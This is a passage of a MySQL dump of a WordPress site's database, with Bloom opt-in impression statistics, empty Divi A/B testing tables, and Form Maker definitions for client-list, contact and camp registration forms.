06:52:50','imp','optin_8','11','','-1',0),(484,'2019-02-14 10:44:00','imp','optin_8','11','','-1',0),(485,'2019-02-14 15:43:59','imp','optin_8','11','','69',0),(486,'2019-02-14 21:44:10','imp','optin_8','11','','-1',0),(487,'2019-02-15 04:36:14','imp','optin_8','11','','-1',0),(488,'2019-02-15 07:29:23','imp','optin_8','11','','-1',0),(489,'2019-02-15 07:50:26','imp','optin_8','11','','-1',0),(490,'2019-02-15 07:51:12','imp','optin_8','11','','-1',0),(491,'2019-02-15 10:51:24','imp','optin_8','11','','-1',0),(492,'2019-02-15 16:13:01','imp','optin_8','11','','68',0),(493,'2019-02-15 16:33:29','imp','optin_8','11','','-1',0),(494,'2019-02-16 10:06:32','imp','optin_8','11','','-1',0),(495,'2019-02-16 10:46:44','imp','optin_8','11','','-1',0),(496,'2019-02-17 22:31:14','imp','optin_8','11','','-1',0),(497,'2019-02-18 00:11:57','imp','optin_8','11','','-1',0),(498,'2019-02-18 00:52:18','imp','optin_8','11','','-1',0),(499,'2019-02-18 03:23:17','imp','optin_8','11','','-1',0),(500,'2019-02-19 21:05:24','imp','optin_8','11','','-1',0),(501,'2019-02-20 00:56:12','imp','optin_8','11','','-1',0),(502,'2019-02-20 01:57:03','imp','optin_8','11','','-1',0),(503,'2019-02-20 05:37:37','imp','optin_8','11','','-1',0),(504,'2019-02-21 16:49:34','imp','optin_8','11','','-1',0),(505,'2019-02-21 16:59:44','imp','optin_8','11','','-1',0),(506,'2019-02-22 09:24:17','imp','optin_8','11','','-1',0),(507,'2019-02-22 10:04:34','imp','optin_8','11','','-1',0),(508,'2019-02-22 10:55:00','imp','optin_8','11','','-1',0),(509,'2019-02-22 11:25:31','imp','optin_8','11','','-1',0),(510,'2019-02-23 07:56:45','imp','optin_8','11','','-1',0),(511,'2019-02-23 10:47:20','imp','optin_8','11','','-1',0),(512,'2019-02-23 18:11:04','imp','optin_8','11','','-1',0),(513,'2019-02-24 05:28:05','imp','optin_8','11','','-1',0),(514,'2019-02-24 05:37:44','imp','optin_8','11','','-1',0),(515,'2019-02-25 09:27:16','imp','optin_8','11','','-1',0),(516,'2019-02-25 09:47:51','imp','optin_8','11','','72',0),(517,'2019-02-25 11:08:09','imp','optin_8','11','','-1',0),(518,'2019-02-25 15:10:11','imp','optin_8','11','','-1',0),(519,'2019-02-25 16:01:21','imp','optin_8','11','','70',0),(520,'2019-02-25 21:55:52','imp','optin_8','11','','-1',0),(521,'2019-02-26 00:06:42','imp','optin_8','11','','-1',0),(522,'2019-02-26 03:37:29','imp','optin_8','11','','-1',0),(523,'2019-02-26 03:37:50','imp','optin_8','11','','70',0),(524,'2019-02-26 06:18:56','imp','optin_8','11','','70',0),(525,'2019-02-27 12:15:51','imp','optin_8','11','','-1',0),(526,'2019-02-27 14:16:05','imp','optin_8','11','','-1',0),(527,'2019-02-27 17:39:26','imp','optin_8','11','','-1',0),(528,'2019-02-27 22:06:53','imp','optin_8','11','','-1',0),(529,'2019-02-28 04:03:51','imp','optin_8','11','','-1',0),(530,'2019-02-28 07:55:27','imp','optin_8','11','','-1',0),(531,'2019-03-01 04:55:17','imp','optin_8','11','','70',0),(532,'2019-03-02 04:43:03','imp','optin_8','11','','70',0),(533,'2019-03-02 12:45:05','imp','optin_8','11','','-1',0),(534,'2019-03-02 19:37:11','imp','optin_8','11','','70',0),(535,'2019-03-03 02:08:59','imp','optin_8','11','','-1',0),(536,'2019-03-03 05:50:54','imp','optin_8','11','','-1',0),(537,'2019-03-03 17:34:11','imp','optin_8','11','','-1',0),(538,'2019-03-04 06:03:18','imp','optin_8','11','','-1',0),(539,'2019-03-04 14:09:26','imp','optin_8','11','','-1',0),(540,'2019-03-04 17:10:20','imp','optin_8','11','','-1',0),(541,'2019-03-04 22:40:24','imp','optin_8','11','','-1',0),(542,'2019-03-05 01:02:46','imp','optin_8','11','','-1',0),(543,'2019-03-05 03:53:34','imp','optin_8','11','','-1',0),(544,'2019-03-05 06:44:29','imp','optin_8','11','','-1',0),(545,'2019-03-05 22:21:23','imp','optin_8','11','','-1',0),(546,'2019-03-06 12:46:20','imp','optin_8','11','','-1',0),(547,'2019-03-07 12:12:56','imp','optin_8','11','','-1',0),(548,'2019-03-07 14:32:05','imp','optin_8','11','','-1',0),(549,'2019-03-07 19:03:54','imp','optin_8','11','','70',0),(550,'2019-03-08 11:43:41','imp','optin_8','11','','-1',0),(551,'2019-03-08 16:51:30','imp','optin_8','11','','-1',0),(552,'2019-03-09 18:15:17','imp','optin_8','11','','-1',0),(553,'2019-03-09 18:25:31','imp','optin_8','11','','-1',0),(554,'2019-03-09 20:56:56','imp','optin_8','11','','-1',0),(555,'2019-03-13 07:20:53','imp','optin_8','11','','-1',0),(556,'2019-03-13 08:25:16','imp','optin_8','11','','-1',0),(557,'2019-03-13 08:35:31','imp','optin_8','11','','-1',0),(558,'2019-03-13 20:26:14','imp','optin_8','11','','-1',0),(559,'2019-03-14 04:21:08','imp','optin_8','11','','-1',0),(560,'2019-03-14 05:51:13','imp','optin_8','11','','-1',0),(561,'2019-03-14 07:39:44','imp','optin_8','11','','-1',0),(562,'2019-03-14 14:44:55','imp','optin_8','11','','-1',0),(563,'2019-03-15 17:40:11','imp','optin_8','11','','-1',0),(564,'2019-03-15 17:40:58','imp','optin_8','11','','72',0),(565,'2019-03-15 18:40:40','imp','optin_8','11','','-1',0),(566,'2019-03-15 21:10:45','imp','optin_8','11','','-1',0),(567,'2019-03-15 21:32:23','imp','optin_8','11','','-1',0),(568,'2019-03-16 02:52:01','imp','optin_8','11','','68',0),(569,'2019-03-16 03:12:09','imp','optin_8','11','','69',0),(570,'2019-03-16 04:13:24','imp','optin_8','11','','-1',0),(571,'2019-03-16 05:33:52','imp','optin_8','11','','-1',0),(572,'2019-03-16 06:23:59','imp','optin_8','11','','-1',0),(573,'2019-03-16 12:45:44','imp','optin_8','11','','65',0),(574,'2019-03-16 23:48:26','imp','optin_8','11','','65',0),(575,'2019-03-17 18:34:10','imp','optin_8','11','','-1',0),(576,'2019-03-17 20:25:15','imp','optin_8','11','','-1',0),(577,'2019-03-18 05:23:44','imp','optin_8','11','','-1',0),(578,'2019-03-18 05:44:08','imp','optin_8','11','','-1',0),(579,'2019-03-18 14:25:59','imp','optin_8','11','','-1',0),(580,'2019-03-18 15:06:20','imp','optin_8','11','','-1',0),(581,'2019-03-19 04:18:18','imp','optin_8','11','','-1',0),(582,'2019-03-19 07:09:33','imp','optin_8','11','','-1',0),(583,'2019-03-19 23:18:43','imp','optin_8','11','','-1',0),(584,'2019-03-20 05:29:28','imp','optin_8','11','','-1',0),(585,'2019-03-21 09:24:47','imp','optin_8','11','','-1',0),(586,'2019-03-21 10:24:59','imp','optin_8','11','','-1',0),(587,'2019-03-21 11:25:04','imp','optin_8','11','','-1',0),(588,'2019-03-22 07:27:42','imp','optin_8','11','','-1',0),(589,'2019-03-24 04:18:10','imp','optin_8','11','','-1',0),(590,'2019-03-24 04:28:15','imp','optin_8','11','','-1',0),(591,'2019-03-24 04:56:20','imp','optin_8','11','','72',0),(592,'2019-03-24 06:36:45','imp','optin_8','11','','69',0),(593,'2019-03-24 06:38:02','imp','optin_8','11','','68',0),(594,'2019-03-24 10:51:03','imp','optin_8','11','','68',0),(595,'2019-03-24 11:33:11','imp','optin_8','11','','65',0),(596,'2019-03-24 11:38:48','imp','optin_8','11','','68',0),(597,'2019-03-24 11:39:43','imp','optin_8','11','','68',0),(598,'2019-03-24 11:40:44','imp','optin_8','11','','69',0),(599,'2019-03-24 11:48:51','imp','optin_8','11','','69',0),(600,'2019-03-24 11:58:46','imp','optin_8','11','','70',0),(601,'2019-03-24 12:18:31','imp','optin_8','11','','72',0),(602,'2019-03-24 12:48:19','imp','optin_8','11','','67',0),(603,'2019-03-24 12:59:26','imp','optin_8','11','','72',0),(604,'2019-03-24 13:18:18','imp','optin_8','11','','65',0),(605,'2019-03-24 13:28:27','imp','optin_8','11','','-1',0),(606,'2019-03-24 13:38:48','imp','optin_8','11','','-1',0),(607,'2019-03-24 13:48:26','imp','optin_8','11','','-1',0),(608,'2019-03-24 14:48:47','imp','optin_8','11','','67',0),(609,'2019-03-24 17:31:05','imp','optin_8','11','','72',0),(610,'2019-03-24 17:31:27','imp','optin_8','11','','68',0),(611,'2019-03-24 17:31:51','imp','optin_8','11','','69',0),(612,'2019-03-24 18:40:09','imp','optin_8','11','','70',0),(613,'2019-03-24 20:01:55','imp','optin_8','11','','68',0),(614,'2019-03-24 20:52:39','imp','optin_8','11','','68',0),(615,'2019-03-24 20:53:21','imp','optin_8','11','','69',0),(616,'2019-03-24 21:11:37','imp','optin_8','11','','72',0),(617,'2019-03-24 21:12:14','imp','optin_8','11','','70',0),(618,'2019-03-24 21:53:41','imp','optin_8','11','','-1',0),(619,'2019-03-24 22:21:13','imp','optin_8','11','','67',0),(620,'2019-03-24 23:02:19','imp','optin_8','11','','-1',0),(621,'2019-03-24 23:06:27','imp','optin_8','11','','-1',0),(622,'2019-03-24 23:12:03','imp','optin_8','11','','-1',0),(623,'2019-03-25 01:57:01','imp','optin_8','11','','72',0),(624,'2019-03-25 02:03:47','imp','optin_8','11','','69',0),(625,'2019-03-25 02:53:14','imp','optin_8','11','','65',0),(626,'2019-03-25 03:43:20','imp','optin_8','11','','65',0),(627,'2019-03-25 05:03:15','imp','optin_8','11','','70',0),(628,'2019-03-25 05:07:38','imp','optin_8','11','','68',0),(629,'2019-03-25 06:03:48','imp','optin_8','11','','72',0),(630,'2019-03-25 06:06:03','imp','optin_8','11','','68',0),(631,'2019-03-25 06:06:37','imp','optin_8','11','','68',0),(632,'2019-03-25 06:07:07','imp','optin_8','11','','69',0),(633,'2019-03-25 06:13:36','imp','optin_8','11','','69',0),(634,'2019-03-25 06:54:24','imp','optin_8','11','','67',0),(635,'2019-03-25 07:06:41','imp','optin_8','11','','69',0),(636,'2019-03-25 07:19:33','imp','optin_8','11','','-1',0),(637,'2019-03-25 07:26:36','imp','optin_8','11','','72',0),(638,'2019-03-25 08:05:33','imp','optin_8','11','','-1',0),(639,'2019-03-25 08:15:36','imp','optin_8','11','','-1',0),(640,'2019-03-25 08:35:20','imp','optin_8','11','','70',0),(641,'2019-03-25 11:12:18','imp','optin_8','11','','67',0),(642,'2019-03-25 16:14:15','imp','optin_8','11','','67',0),(643,'2019-03-25 19:55:39','imp','optin_8','11','','-1',0),(644,'2019-03-27 07:47:36','imp','optin_8','11','','-1',0),(645,'2019-03-27 20:05:10','imp','optin_8','11','','-1',0),(646,'2019-03-27 20:25:47','imp','optin_8','11','','-1',0),(647,'2019-03-27 22:20:20','imp','optin_8','11','','-1',0),(648,'2019-03-30 15:58:37','imp','optin_8','11','','-1',0),(649,'2019-04-10 23:35:49','imp','optin_8','11','','65',0),(650,'2019-04-15 18:50:50','imp','optin_8','11','','-1',0),(651,'2019-05-16 12:07:26','imp','optin_8','11','','-1',0),(652,'2019-05-16 14:55:40','imp','optin_8','11','','-1',0),(653,'2019-05-21 10:38:27','imp','optin_8','11','','67',0),(654,'2019-05-26 14:33:21','imp','optin_8','11','','-1',0),(655,'2019-05-26 14:33:21','imp','optin_8','11','','-1',0),(656,'2019-05-26 14:33:22','imp','optin_8','11','','-1',0),(657,'2019-05-27 10:19:18','imp','optin_8','11','','-1',0),(658,'2019-05-29 09:36:50','imp','optin_8','11','','-1',0),(659,'2019-07-22 12:26:40','imp','optin_8','11','','-1',0),(660,'2019-07-22 13:11:52','imp','optin_8','11','','-1',0),(661,'2019-07-23 09:57:38','imp','optin_8','11','','-1',0),(662,'2019-07-23 15:26:11','imp','optin_8','11','','-1',0),(663,'2019-07-24 13:22:30','imp','optin_8','18','','-1',0),(664,'2019-07-24 13:26:15','imp','optin_8','18','','-1',0),(665,'2019-07-25 12:18:28','imp','optin_8','18','','-1',0),(666,'2019-07-26 10:15:18','imp','optin_8','18','','-1',0),(667,'2019-07-29 10:14:24','imp','optin_8','18','','-1',0),(668,'2019-07-31 09:09:36','imp','optin_8','18','','-1',0),(669,'2019-08-01 17:04:24','imp','optin_8','18','','-1',0),(670,'2019-08-02 11:08:23','imp','optin_8','18','','-1',0),(671,'2019-08-15 09:11:04','imp','optin_8','18','','-1',0),(672,'2019-08-19 22:17:05','imp','optin_8','18','','65',0),(673,'2019-08-20 09:45:25','imp','optin_8','18','','-1',0),(674,'2019-08-23 08:23:16','imp','optin_8','18','','-1',0),(675,'2019-08-23 11:59:11','imp','optin_8','18','','-1',0),(676,'2019-08-26 12:01:11','imp','optin_8','18','','-1',0),(677,'2019-08-26 14:36:26','imp','optin_8','18','','-1',0),(678,'2019-08-27 01:36:35','imp','optin_8','18','','-1',0);
/*!40000 ALTER TABLE `wpxb_et_bloom_stats` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpxb_et_divi_ab_testing_clients`
--

DROP TABLE IF EXISTS `wpxb_et_divi_ab_testing_clients`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_et_divi_ab_testing_clients` (
  `id` mediumint(9) NOT NULL AUTO_INCREMENT,
  `test_id` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL,
  `subject_id` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL,
  `client_id` varchar(32) COLLATE utf8mb4_unicode_ci NOT NULL,
  UNIQUE KEY `id` (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpxb_et_divi_ab_testing_clients`
--

LOCK TABLES `wpxb_et_divi_ab_testing_clients` WRITE;
/*!40000 ALTER TABLE `wpxb_et_divi_ab_testing_clients` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpxb_et_divi_ab_testing_clients` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpxb_et_divi_ab_testing_stats`
--

DROP TABLE IF EXISTS `wpxb_et_divi_ab_testing_stats`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_et_divi_ab_testing_stats` (
  `id` mediumint(9) NOT NULL AUTO_INCREMENT,
  `test_id` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL,
  `subject_id` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL,
  `record_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `event` varchar(10) COLLATE utf8mb4_unicode_ci NOT NULL,
  `client_id` varchar(32) COLLATE utf8mb4_unicode_ci NOT NULL,
  UNIQUE KEY `id` (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpxb_et_divi_ab_testing_stats`
--

LOCK TABLES `wpxb_et_divi_ab_testing_stats` WRITE;
/*!40000 ALTER TABLE `wpxb_et_divi_ab_testing_stats` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpxb_et_divi_ab_testing_stats` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpxb_formmaker`
--

DROP TABLE IF EXISTS `wpxb_formmaker`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_formmaker` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `title` varchar(127) NOT NULL,
  `type` varchar(100) NOT NULL,
  `mail` varchar(128) NOT NULL,
  `form_front` longtext NOT NULL,
  `theme` int(11) NOT NULL,
  `javascript` text NOT NULL,
  `submit_text` longtext NOT NULL,
  `url` varchar(200) NOT NULL,
  `submit_text_type` tinyint(4) NOT NULL,
  `script_mail` text NOT NULL,
  `script_mail_user` text NOT NULL,
  `counter` int(11) NOT NULL,
  `published` int(11) NOT NULL DEFAULT 1,
  `label_order` text NOT NULL,
  `label_order_current` text NOT NULL,
  `article_id` varchar(500) NOT NULL,
  `pagination` varchar(128) NOT NULL,
  `show_title` varchar(128) NOT NULL,
  `show_numbers` varchar(128) NOT NULL,
  `public_key` varchar(50) NOT NULL,
  `private_key` varchar(50) NOT NULL,
  `recaptcha_theme` varchar(20) NOT NULL,
  `paypal_mode` int(2) NOT NULL,
  `checkout_mode` varchar(20) NOT NULL,
  `paypal_email` varchar(50) NOT NULL,
  `payment_currency` varchar(20) NOT NULL,
  `tax` float NOT NULL,
  `form_fields` longtext NOT NULL,
  `savedb` tinyint(4) NOT NULL DEFAULT 1,
  `sendemail` tinyint(4) NOT NULL DEFAULT 1,
  `requiredmark` varchar(20) NOT NULL DEFAULT '*',
  `from_mail` varchar(128) NOT NULL,
  `from_name` varchar(128) NOT NULL,
  `reply_to` varchar(128) NOT NULL,
  `send_to` varchar(128) NOT NULL,
  `autogen_layout` tinyint(4) NOT NULL DEFAULT 1,
  `custom_front` longtext NOT NULL,
  `mail_from_user` varchar(128) NOT NULL,
  `mail_from_name_user` varchar(128) NOT NULL,
  `reply_to_user` varchar(128) NOT NULL,
  `condition` text NOT NULL,
  `mail_cc` varchar(128) NOT NULL,
  `mail_cc_user` varchar(128) NOT NULL,
  `mail_bcc` varchar(128) NOT NULL,
  `mail_bcc_user` varchar(128) NOT NULL,
  `mail_subject` varchar(128) NOT NULL,
  `mail_subject_user` varchar(128) NOT NULL,
  `mail_mode` tinyint(4) NOT NULL DEFAULT 1,
  `mail_mode_user` tinyint(4) NOT NULL DEFAULT 1,
  `mail_attachment` tinyint(4) NOT NULL DEFAULT 1,
  `mail_attachment_user` tinyint(4) NOT NULL DEFAULT 1,
  `user_id_wd` varchar(220) NOT NULL,
  `sortable` int(11) NOT NULL,
  `frontend_submit_fields` text NOT NULL,
  `frontend_submit_stat_fields` text NOT NULL,
  `mail_emptyfields` tinyint(4) NOT NULL DEFAULT 0,
  `mail_verify` tinyint(4) NOT NULL DEFAULT 0,
  `mail_verify_expiretime` float NOT NULL,
  `mail_verification_post_id` int(11) NOT NULL,
  `save_uploads` tinyint(4) NOT NULL DEFAULT 1,
  `header_title` varchar(255) NOT NULL,
  `header_description` text NOT NULL,
  `header_image_url` varchar(255) NOT NULL,
  `header_image_animation` varchar(200) NOT NULL,
  `header_hide_image` tinyint(4) NOT NULL DEFAULT 1,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=20 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpxb_formmaker`
--

LOCK TABLES `wpxb_formmaker` WRITE;
/*!40000 ALTER TABLE `wpxb_formmaker` DISABLE KEYS */;
INSERT INTO `wpxb_formmaker` VALUES (1,'Client List Form','embedded','','<div class=\"wdform-page-and-images\" style=\"display:table; border-top:0px solid black;\"><div id=\"form_id_tempform_view1\" class=\"wdform_page\" page_title=\"Untitled page\" next_title=\"Next\" next_type=\"text\" next_class=\"wdform-page-button\" next_checkable=\"false\" previous_title=\"Previous\" previous_type=\"text\" previous_class=\"wdform-page-button\" previous_checkable=\"false\"><div class=\"wdform_section\"><div class=\"wdform_column ui-sortable\"><div wdid=\"1\" class=\"wdform_row ui-sortable-handle\">%1 - First Name%</div><div wdid=\"2\" class=\"wdform_row ui-sortable-handle\">%2 - Last Name%</div><div wdid=\"3\" class=\"wdform_row ui-sortable-handle\">%3 - E-mail:%</div><div wdid=\"4\" class=\"wdform_row ui-sortable-handle\">%4 - Phone%</div><div wdid=\"5\" class=\"wdform_row ui-sortable-handle\">%5 - Website%</div><div wdid=\"6\" class=\"wdform_row ui-sortable-handle\">%6 - Address%</div><div wdid=\"12\" class=\"wdform_row ui-sortable-handle\">%12 - type_submit_reset_12%</div></div></div><div valign=\"top\" class=\"wdform_footer\" style=\"width: 100%;\"><div style=\"width: 100%;\"><div style=\"width: 100%; display: table; padding-top:10px;\"><div style=\"display: table-row-group;\"><div id=\"form_id_temppage_nav1\" style=\"display: table-row;\"></div></div></div></div></div></div></div>',8,'// Occurs before the form is loaded\r\nfunction before_load() {	\r\n}	\r\n// Occurs just before submitting  the form\r\nfunction before_submit() {\r\n// IMPORTANT! If you want to interrupt (stop) the submitting of the form, this function should return true. You don\'t need to return any value if you don\'t want to stop the submission.\r\n}	\r\n// Occurs just before resetting the form\r\nfunction before_reset() {	\r\n}','','',0,'%all%','%all%',13,1,'1#**id**#First Name#**label**#type_text#****#2#**id**#Last Name#**label**#type_text#****#3#**id**#E-mail:#**label**#type_submitter_mail#****#4#**id**#Phone#**label**#type_text#****#5#**id**#Website#**label**#type_text#****#6#**id**#Street Address#**label**#type_address#****#7#**id**#Street Address Line 2#**label**#type_address#****#8#**id**#City#**label**#type_address#****#9#**id**#State#**label**#type_address#****#10#**id**#Postal / Zip Code#**label**#type_address#****#11#**id**#Country#**label**#type_address#****#12#**id**#type_submit_reset_12#**label**#type_submit_reset#****##**id**##**label**##****#','1#**id**#First Name#**label**#type_text#****#2#**id**#Last Name#**label**#type_text#****#3#**id**#E-mail:#**label**#type_submitter_mail#****#4#**id**#Phone#**label**#type_text#****#5#**id**#Website#**label**#type_text#****#6#**id**#Street Address#**label**#type_address#****#7#**id**#Street Address Line 2#**label**#type_address#****#8#**id**#City#**label**#type_address#****#9#**id**#State#**label**#type_address#****#10#**id**#Postal / Zip Code#**label**#type_address#****#11#**id**#Country#**label**#type_address#****#12#**id**#type_submit_reset_12#**label**#type_submit_reset#****#','0','none','false','true','','','',0,'testmode','','',0,'1*:*id*:*type_text*:*type*:*First Name*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*220*:*w_size*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*2*:*id*:*type_text*:*type*:*Last Name*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*220*:*w_size*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*3*:*id*:*type_submitter_mail*:*type*:*E-mail:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*220*:*w_size*:**:*w_first_val*:**:*w_title*:*yes*:*w_required*:*no*:*w_unique*:**:*w_class*:*no*:*w_verification*:*E-mail confirmation:*:*w_verification_label*:**:*w_verification_placeholder*:*no*:*w_autofill*:**:*new_field*:*4*:*id*:*type_text*:*type*:*Phone*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*220*:*w_size*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*5*:*id*:*type_text*:*type*:*Website*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*220*:*w_size*:*http://example.com*:*w_first_val*:*http://example.com*:*w_title*:*no*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*6*:*id*:*type_address*:*type*:*Address*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*220*:*w_size*:*Street Address***Street Address Line 2***City***State***Postal / Zip Code***Country*:*w_mini_labels*:*no***no***no***no***no***no***no*:*w_disabled_fields*:*no*:*w_required*:*wdform_address*:*w_class*:**:*new_field*:*12*:*id*:*type_submit_reset*:*type*:*type_submit_reset_12*:*w_field_label*:*Subscribe*:*w_submit_title*:*Reset*:*w_reset_title*:**:*w_class*:*false*:*w_act*:**:*new_field*:*',1,1,'*','','','','',1,'','','','','','','','','','','',1,1,1,1,'administrator,',1,'','',0,0,0,27970,1,'Join Our Customer Base','','http://companyregistration.online/wp-content/plugins/form-maker/images/demo/1.png','rotateInUpLeft',1),(2,'Co Reg Contact Us','embedded','info@companyregistration.online,','<div class=\"wdform-page-and-images\" style=\"display:table; border-top:0px solid black;\"><div id=\"form_id_tempform_view1\" class=\"wdform_page\" page_title=\"Untitled page\" next_title=\"Next\" next_type=\"text\" next_class=\"wdform-page-button\" next_checkable=\"false\" previous_title=\"Previous\" previous_type=\"text\" previous_class=\"wdform-page-button\" previous_checkable=\"false\"><div class=\"wdform_section\"><div class=\"wdform_column ui-sortable\"><div wdid=\"1\" class=\"wdform_row ui-sortable-handle\">%1 - Name:%</div><div wdid=\"2\" class=\"wdform_row ui-sortable-handle\">%2 - Enter your E-mail:%</div><div wdid=\"9\" class=\"wdform_row ui-sortable-handle\" style=\"\">%9 - custom_9%</div><div wdid=\"7\" class=\"wdform_row ui-sortable-handle\">%7 - Message%</div><div wdid=\"8\" class=\"wdform_row ui-sortable-handle\">%8 - type_submit_reset_8%</div></div></div><div valign=\"top\" class=\"wdform_footer\" style=\"width: 100%;\"><div style=\"width: 100%;\"><div style=\"width: 100%; display: table; padding-top:10px;\"><div style=\"display: table-row-group;\"><div id=\"form_id_temppage_nav1\" style=\"display: table-row;\"></div></div></div></div></div></div></div>',2,'// Occurs before the form is loaded\r\nfunction before_load() {	\r\n}	\r\n// Occurs just before submitting  the form\r\nfunction before_submit() {\r\n	// IMPORTANT! If you want to interrupt (stop) the submitting of the form, this function should return true. You don\'t need to return any value if you don\'t want to stop the submission.\r\n}	\r\n// Occurs just before resetting the form\r\nfunction before_reset() {	\r\n}','','',1,'%all%','%all%',10,1,'1#**id**#Name:#**label**#type_name#****#2#**id**#Enter your E-mail:#**label**#type_submitter_mail#****#9#**id**#custom_9#**label**#type_editor#****#7#**id**#Message#**label**#type_textarea#****#8#**id**#type_submit_reset_8#**label**#type_submit_reset#****#4#**id**#CMS#**label**#type_radio#****#5#**id**#Extension#**label**#type_own_select#****#6#**id**#Plugin#**label**#type_own_select#****#3#**id**#Message subject#**label**#type_text#****##**id**##**label**##****#','1#**id**#Name:#**label**#type_name#****#2#**id**#Enter your E-mail:#**label**#type_submitter_mail#****#9#**id**#custom_9#**label**#type_editor#****#7#**id**#Message#**label**#type_textarea#****#8#**id**#type_submit_reset_8#**label**#type_submit_reset#****#','0','none','false','true','','','',1,'testmode','','USD',0,'1*:*id*:*type_name*:*type*:*Name:*:*w_field_label*:*500*:*w_field_label_size*:*top*:*w_field_label_pos*:*no*:*w_hide_label*:*First***Last*******:*w_first_val*:*First***Last*******:*w_title*:*Title*********Middle*:*w_mini_labels*:*250*:*w_size*:*normal*:*w_name_format*:*yes*:*w_required*:*no*:*w_unique*:**:*w_class*:*no***no*:*w_name_fields*:*no*:*w_autofill*:**:*new_field*:*2*:*id*:*type_submitter_mail*:*type*:*Enter your E-mail:*:*w_field_label*:*500*:*w_field_label_size*:*top*:*w_field_label_pos*:*no*:*w_hide_label*:*500*:*w_size*:**:*w_first_val*:**:*w_title*:*yes*:*w_required*:*no*:*w_unique*:**:*w_class*:*no*:*w_verification*:*E-mail confirmation:*:*w_verification_label*:**:*w_verification_placeholder*:*no*:*w_autofill*:**:*new_field*:*9*:*id*:*type_editor*:*type*:*custom_9*:*w_field_label*:*<p><br data-mce-bogus=\"1\"></p><p><span style=\"font-size: 18pt;\" data-mce-style=\"font-size: 18pt;\"><strong>How may we assist you today</strong></span><br></p><p>Feel free to simply ask a question or leave a comment<br data-mce-bogus=\"1\"></p>*:*w_editor*:**:*new_field*:*7*:*id*:*type_textarea*:*type*:*Message*:*w_field_label*:*500*:*w_field_label_size*:*top*:*w_field_label_pos*:*no*:*w_hide_label*:*500*:*w_size_w*:*120*:*w_size_h*:**:*w_first_val*:**:*w_title*:*yes*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*8*:*id*:*type_submit_reset*:*type*:*type_submit_reset_8*:*w_field_label*:*Submit*:*w_submit_title*:*Reset*:*w_reset_title*:**:*w_class*:*true*:*w_act*:**:*new_field*:*',1,1,'*','','','','',1,'','','','','','','','','','Company Registration Contact Form submission','',1,1,1,1,'administrator,',1,'','',0,0,0,27970,1,'Contact Us','<span style=\"color: #ffffff;\">You may contact us by filling in this form any time you  have any questions. You can also fill in the form to leave your comments or feedback.</span>','http://companyregistration.online/wp-content/plugins/form-maker/images/demo/2.png','rotateInUpRight',1),(3,'Camp Registration Form','embedded','','<div class=\"wdform-page-and-images\" style=\"display:table; border-top:0px solid black;\"><div id=\"form_id_tempform_view1\" class=\"wdform_page\" page_title=\"Untitled page\" next_title=\"Next\" next_type=\"text\" next_class=\"wdform-page-button\" next_checkable=\"false\" previous_title=\"Previous\" previous_type=\"text\" previous_class=\"wdform-page-button\" previous_checkable=\"false\"><div class=\"wdform_section\"><div class=\"wdform_column ui-sortable\"><div wdid=\"1\" class=\"wdform_row ui-sortable-handle\">%1 - Camper Name:%</div><div wdid=\"2\" class=\"wdform_row ui-sortable-handle\">%2 - Camper Age Group:%</div><div wdid=\"3\" class=\"wdform_row ui-sortable-handle\">%3 - Desire Cabin:%</div><div wdid=\"4\" class=\"wdform_row ui-sortable-handle\">%4 - Does any one have allergies?%</div><div wdid=\"5\" class=\"wdform_row ui-sortable-handle\">%5 - Has the camper been camping before?%</div><div wdid=\"6\" class=\"wdform_row ui-sortable-handle\">%6 - Any questions or 